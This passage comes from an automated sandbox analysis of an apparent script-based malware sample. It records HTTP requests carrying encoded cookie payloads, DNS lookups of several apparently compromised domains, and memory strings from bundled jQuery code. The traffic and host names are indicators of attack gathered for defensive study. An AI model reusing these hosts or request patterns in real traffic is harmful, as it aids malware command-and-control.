EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: pensuni.comConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQy07DMBD8FfIDPSHuxQSaQ9WobqnUCwrOJlnil3adNJXy8Ti4lAPywbO7M571fFaqb8kNtj5U3G8chzlTznYJMDHHKzTG2TmrtU79+mLmDCavHQHNWeNsqGlMs6LWMGfYNpM4FhJoRHWr822c2gBa+M2LKOWo/mpQ+FN/dfjBvyLN1WK/BePo+iCc8QTMuKyya5pIERpVf3D7YelYWHu/Kt6EWJ3Q3p29uwBxB1rPWRn1YEMV4huvcWlRqS5S9ut34fXTY0TQIge6RjTYgAaeyfXLFyVUpLpoMGe39XhphoC2lVerUnCyJXNXLJb55IEQrIJEYEwhsVk+xt45zWPkhorCFuzwjz+qJJBXDhBDP8AUCuuHkOZH0W3OWB53zxLNuajFucnXuzi4oI0nAe3aJbKTwZJGmX8DN3pm7vIBAADtpw4=; EAD88BCF932=8DytH4sIAAAAAAAEAO3LMQqDQBBG4atMDuAhzCLRIiq4NlsIalYdUGfRCVrk8Ak5hNXfvsdn/anZGt6ayq7Nk/tNdhmU7K/Tf1Acwsx9qyzr51abKXVc1sW94sVlL+OGJC60yf1Btu0ooofIOHsy0yaLBwAAAAAAAAAAAAAAAAAAAAAAuBR8AQ4bZ3jwEgAA7acO; EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: alseraj.netConnection: Close
Source: global trafficDNS traffic detected: DNS query: acceleratedigital.com.au
Source: global trafficDNS traffic detected: DNS query: saeedmdcat.com
Source: global trafficDNS traffic detected: DNS query: wickandjuice.co.za
Source: global trafficDNS traffic detected: DNS query: werrrk.com
Source: global trafficDNS traffic detected: DNS query: www.anifowoshe.com
Source: global trafficDNS traffic detected: DNS query: pensuni.com
Source: global trafficDNS traffic detected: DNS query: skagitorganics.net
Source: global trafficDNS traffic detected: DNS query: thezoneheights.co.za
Source: global trafficDNS traffic detected: DNS query: alseraj.net
Source: global trafficDNS traffic detected: DNS query: pydata.org
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.jquery.com/ticket/12359
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.jquery.com/ticket/13378
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dev.w3.org/csswg/cssom/#resolved-values
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jquery.com/
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jquery.org/license
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jsperf.com/getall-vs-sizzle/2
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jsperf.com/thor-indexof-vs-for/5
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sizzlejs.com/
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html
